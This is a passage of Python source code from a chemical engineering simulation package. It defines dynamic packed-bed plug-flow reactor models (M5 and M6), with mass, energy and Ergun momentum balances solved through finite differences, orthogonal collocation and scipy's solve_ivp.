pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM5(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
[dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
zNo: number of finite difference points in the z direction
varNo: number of variables (Ci, CT, T)
varNoT: total number of variables in the domain (zNo*varNo)
reactionListNo: reaction list number
dz: differential length [m]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K],
reactionRateExpr: reaction rate expressions
VARS: list of variables
RATES: list of rate expressions
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# dz [m]
dz = const['dz']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# zNo
zNo = const['zNo']
# var no.
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity along the reactor length [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate
Ri_z = np.zeros((zNo, reactionListNo))
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
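# P and v are treated as static (quasi-steady) profiles: they are marched along z by
# explicit Euler inside this call, while Ci and T are the dynamic states integrated in time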
# component no.
# y: species concentrations and temperature distributed along z
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# species concentration [kmol/m^3]
CoSpi = np.zeros(compNo)
# reaction rate
ri = np.zeros(compNo)
ri0 = np.zeros(compNo)
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (varNo, zNo))
# -> concentration [mol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
for i in range(compNo):
_SpCoi = yLoop[i, :]
SpCoi_z[i, :] = _SpCoi
# temperature [K]
T_z = np.zeros(zNo)
T_z = yLoop[indexT, :]
# diff/dt
# dxdt = []
# matrix
dxdtMat = np.zeros((varNo, zNo))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(zNo):
## block ##
# FIXME
# concentration species [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# temperature [K]
T = T_z[z]
# pressure [Pa]
P = P_z[z]
# velocity
v = v_z[z]
## calculate ##
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaBeDe[kgcat/m^3]
# r0 = np.array(PackedBedReactorClass.modelReactions(
# P_z[z], T_z[z], MoFri, CaBeDe))
# loop
loopVars0 = (T_z[z], P_z[z], MoFri, CoSpi)
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# r0 = np.copy(RiLoop)
# loop
Ri_z[z, :] = r0
# REVIEW
# component formation rate [kmol/m^3.s]
# call
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_z[z, :])
# overall formation rate [kmol/m^3.s]
OvR = np.sum(ri)
# NOTE
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic reaction (positive sign)
OvHeReT = np.dot(Ri_z[z, :], HeReT)
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [kJ/m^3.s]
# if Tm == 0:
# # adiabatic
# Qm0 = 0
# else:
# # heat added/removed from the reactor
# # Tm > T: heat is added (positive sign)
# # T > Tm: heat removed (negative sign)
# Qm0 = (Ua*(Tm - T))*1e-3
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'kJ/m^3.s')
# NOTE
# velocity from global concentration
# check BC
if z == 0:
# BC1
T_b = T0
else:
# interior nodes
T_b = T_z[z - 1]
dxdt_v_T = (T_z[z] - T_b)/dz
# CoSp x 1000
# OvR x 1000
dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
((1/T)*dxdt_P - (P/T**2)*dxdt_v_T) + OvR*1000)
# the forward node of the velocity profile is updated here using the backward (old)
# temperature value; dT/dt corrects that value at the next time step
v_z[z+1] = dxdt_v*dz + v_z[z]
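# dv/dz comes from the ideal-gas total concentration CT = P/(R*T):
# d(CT*v)/dz = OvR  =>  dv/dz = (1/CT)*(OvR - v*dCT/dz);
# the 1000 factors convert CoSp and OvR between kmol and mol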
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# loop vars
const_F1 = 1/BeVoFr
const_T1 = MoFl*CpMeanMixture
const_T2 = 1/(CoSp*CpMeanMixture*BeVoFr + (1-BeVoFr)*CaDe*CaSpHeCa)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0:
# BC1
Ci_b = SpCoi0[i]
else:
# interior nodes
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
# backward difference
dCdz = (Ci_c - Ci_b)/dz
# mass balance
dxdt_F = const_F1*(-v_z[z]*dCdz - Ci_c*dxdt_v + ri[i])
dxdtMat[i][z] = dxdt_F
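# first-order upwind (backward) difference in z for the convection-dominated
# gas-phase mass balance: dCi/dt = (1/e)*(-v*dCi/dz - Ci*dv/dz + ri)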
# energy balance (temperature) [K]
# temp [K]
T_c = T_z[z]
# check BC
if z == 0:
# BC1
T_b = T0
else:
# interior nodes
T_b = T_z[z - 1]
# backward difference
dTdz = (T_c - T_b)/dz
dxdt_T = const_T2*(-const_T1*dTdz + (-OvHeReT + Qm))
dxdtMat[indexT][z] = dxdt_T
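# const_T2 is the inverse effective volumetric heat capacity of the bed,
# 1/[CoSp*Cp*e + (1-e)*CaDe*CaSpHeCa]; the bracket collects axial convection
# (-MoFl*Cp*dT/dz), reaction heat (-OvHeReT) and external exchange (Qm)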
# flat
dxdt = dxdtMat.flatten().tolist()
print("time: ", t)
return dxdt
# NOTE
#! dynamic heterogeneous modeling
def runM6(self):
"""
M6 modeling case
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (dynamic, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: orthogonal collocation
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# REVIEW
# domain length
DoLe = 1
# finite difference points in the z direction
zNo = solverSetting['S2']['zNo']
# length list
dataXs = np.linspace(0, ReLe, zNo)
# element size - dz [m]
dz = ReLe/(zNo-1)
# orthogonal collocation points in the r direction
rNo = solverSetting['S2']['rNo']
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo + 1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo + 1
# number of var columns [i]
varNoColumns = zNo
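# state layout: one layer per component plus one temperature layer; within a layer,
# row 0 is the gas-phase profile along z and rows 1..rNo are the catalyst
# (orthogonal collocation) points at each axial node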
# initial values at t = 0 and z >> 0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# gas (j == 0) and solid (j > 0) phases start from the same inlet concentration
IV2D[m][j][i] = SpCoi0[m]
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# gas and solid phases start from the same inlet temperature
IV2D[noLayer - 1][j][i] = T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# FIXME
# solver setting
# orthogonal collocation method
OrCoClassSet = OrCoClass()
OrCoClassSetRes = OrCoClassSet.buildMatrix()
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0
},
"meshSetting": {
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz
},
"solverSetting": {
"OrCoClassSetRes": OrCoClassSetRes
},
"reactionRateExpr": reactionRateExpr
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
# ode call
# method [1]: LSODA, [2]: BDF, [3]: Radau
sol = solve_ivp(PackedBedReactorClass.modelEquationM6,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise RuntimeError("ODE solver failed for the current time interval")
# time interval
dataTime = sol.t
# all results
# components, temperature layers
dataYs = sol.y
# std format
dataYs_Reshaped = np.reshape(
dataYs[:, -1], (noLayer, varNoRows, varNoColumns))
# component concentration [kmol/m^3]
# Ci and Cs
# dataYs1 = dataYs[0:varNoCon, -1]
# 3d matrix
# dataYs1_Reshaped = np.reshape(
# dataYs1, (compNo, varNoRows, varNoColumns))
dataYs1_Reshaped = dataYs_Reshaped[:-1]
# gas phase
dataYs1GasPhase = dataYs1_Reshaped[:, 0, :]
# solid phase
dataYs1SolidPhase = dataYs1_Reshaped[:, 1:, :]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1GasPhase, axis=0)
dataYs1_MoFri = dataYs1GasPhase/dataYs1_Ctot
# temperature - 2d matrix
# dataYs2 = np.array([dataYs[varNoCon:varNoLayerT, -1]])
# 2d matrix
# dataYs2_Reshaped = np.reshape(
# dataYs2, (1, varNoRows, varNoColumns))
dataYs2_Reshaped = dataYs_Reshaped[indexTemp]
# gas phase
dataYs2GasPhase = dataYs2_Reshaped[0, :].reshape((1, zNo))
# solid phase
dataYs2SolidPhase = dataYs2_Reshaped[1:, :]
# combine
_dataYs = np.concatenate(
(dataYs1_MoFri, dataYs2GasPhase), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCon": dataYs1GasPhase,
"dataYTemp": dataYs2GasPhase,
"dataYs": _dataYs,
"dataYCons": dataYs1SolidPhase,
"dataYTemps": dataYs2SolidPhase,
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
ssdataLists = [ssdataList[0:compNo],
ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle, ssdataLists)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM6(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M6 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: total number of variables in the domain (zNo*varNo)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference points in the z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
solverSetting:
OrCoClassSetRes: constants of OC methods
reactionRateExpr: reaction rate expressions
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# mesh setting
meshSetting = FunParam['meshSetting']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# solver setting
solverSetting = FunParam['solverSetting']
# number of collocation points
ocN = solverSetting['OrCoClassSetRes']['N']
ocXc = solverSetting['OrCoClassSetRes']['Xc']
ocA = solverSetting['OrCoClassSetRes']['A']
ocB = solverSetting['OrCoClassSetRes']['B']
ocQ = solverSetting['OrCoClassSetRes']['Q']
# init OrCoCatParticle
OrCoCatParticleClassSet = OrCoCatParticleClass(
ocXc, ocN, ocQ, ocA, ocB, varNo)
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# component no.
# y: species concentrations and temperatures in the gas and solid phases
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
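# for spherical pellets the external area per unit bed volume is
# 6*(1-e)/dp = 3*(1-e)/Rp, which is what the expression above evaluates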
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [mol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer - 1]
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
CosSpi_r[r][i] = max(_CosSpi_z, CONST.EPS_CONST)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# temperature [K]
T = T_z[z]
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
# pressure [Pa]
P = P_z[z]
# velocity
v = v_z[z]
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
